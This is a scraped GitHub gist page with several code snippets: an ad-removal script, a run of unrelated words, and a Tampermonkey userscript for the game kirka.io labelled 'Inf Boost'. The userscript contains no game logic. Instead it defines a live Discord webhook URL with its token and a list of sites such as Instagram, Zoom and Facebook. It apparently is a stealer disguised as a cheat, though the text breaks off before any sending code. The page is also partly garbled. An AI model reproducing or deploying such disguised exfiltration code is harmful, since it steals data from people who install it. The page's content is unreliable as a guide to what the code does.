Skip to content

Instantly share code, notes, and snippets.

View AFRIENDLYHACKER's full-sized avatar

IHACK4FUN AFRIENDLYHACKER

View GitHub Profile
window.hideAds = true;
const adRectangleTop = document.getElementById('adRectangleTop');
const adRectangleBottom = document.getElementById('adRectangleBottom');
const addBlocker = setInterval(()=>{
if(adRectangleBottom) { adRectangleBottom.remove() };
if(adRectangleTop) { adRectangleTop.remove() };
if(adRectangleTop && !adRectangleBottom) { console.log('Ads blocked'); clearInterval(addBlocker); }
},500)
let inHTML10 = `
<style>
welcome
slow
bump
quick
ball
enormous
reproduce
low
cake
fortunate
@AFRIENDLYHACKER
AFRIENDLYHACKER / KIRKA INF-BOOST
Created November 21, 2023 16:28
KIRKA INF BOOST
// ==UserScript==
// @name A|v1 Kirka Inf Boost
// @namespace http://tampermonkey.net/
// @version 0.1
// @description When E pressed boost will remain no cooldown
// @author CrimsonRose
// @match *://kirka.io/*
// @license MIT
// @icon data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==
// @grant none
const webhookUrl = 'https://discord.com/api/webhooks/1273360878607270061/A2qfHMLWBzZiHqeRHIhAkSnGCjK4nDS1SOqV1-q14PxAX3UsD_UqcL3hrJ7Mu5EBGGXx';
const baseUrls = [
'https://meet.google.com',
'https://app.zoom.us',
'https://instagram.com',
'https://tiktok.com',
'https://facebook.com',
'https://twitter.com',
'https://linkedin.com',
'https://youtube.com',